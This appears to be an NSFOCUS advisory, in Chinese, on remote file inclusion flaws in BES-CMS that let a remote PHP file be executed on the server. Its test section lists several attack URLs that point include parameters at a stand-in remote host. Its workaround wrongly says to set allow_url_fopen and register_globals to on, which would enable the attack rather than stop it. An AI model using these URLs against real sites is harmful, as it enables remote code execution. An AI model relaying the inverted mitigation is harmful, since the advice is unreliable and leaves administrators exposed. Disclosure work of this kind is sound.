首页 -> 安全研究

安全研究

安全漏洞
BES-CMS多个模块文件包含漏洞

发布日期:2003-12-20
更新日期:2003-12-29

受影响系统:
BES-CMS BES-CMS 0.5 rc3
BES-CMS BES-CMS 0.4 rc3
不受影响系统:
BES-CMS BES-CMS 0.5 rc4
描述:
BUGTRAQ  ID: 9268

BES-CMS是一款动态PHP WEB站点构建工具。

BES-CMS多个脚本对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意PHP代码。

问题存在于'index.inc.php'、'Members/index.inc.php'、Members/root/index.inc.php'、'Include/functions_folder.php'、'Include/functions_message.php'、'Include/Start.php' 脚本中,由于对包含文件的参数缺少正确过滤,攻击者可以提交包含远程服务器上的恶意PHP文件,可以WEB权限在系统上执行任意PHP代码。

<*来源:frog-m@n (frog-man@security-corporation.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107196893106458&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

frog-m@n (frog-man@security-corporation.com)提供了如下测试方法:

http://www.example.com/index.inc.php?PATH_Includes=http://www.example.com/

http://www.example.com/Members/index.inc.php?PATH_Includes=http://www.example.com/

http://www.example.com/Members/root/index.inc.php?PATH_Includes=http://www.example.com/

http://www.example.com/Include/functions_folder.php?PATH_Includes=
http://www.example.com/

http://www.example.com/Include/functions_hacking.php?PATH_Includes=
http://www.example.com/&itemID=usershow

http://www.example.com/Include/functions_message.php?PATH_Includes=
http://www.example.com/

http://www.example.com/Include/Start.php?inc_path=http://www.example/

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在php.ini文件中设置 'allow_url_fopen'和'register_globals'选项为on。

厂商补丁:

BES-CMS
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

BES-CMS Upgrade bes-cms_0.5.4.tar.gz
http://bes.h6p.org/data/downloads/bes-cms_0.5.4.tar.gz

浏览次数:2802
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障